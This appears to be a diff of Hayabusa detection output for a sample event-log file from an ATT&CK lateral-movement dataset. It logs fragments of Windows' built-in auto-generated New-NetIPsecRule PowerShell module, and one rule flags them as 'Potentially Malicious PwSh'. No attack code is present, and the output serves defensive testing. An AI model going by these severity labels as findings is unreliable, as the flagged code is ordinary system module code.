$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] 
${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] 
${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { 
[object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = 
${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; 
ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 
= 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 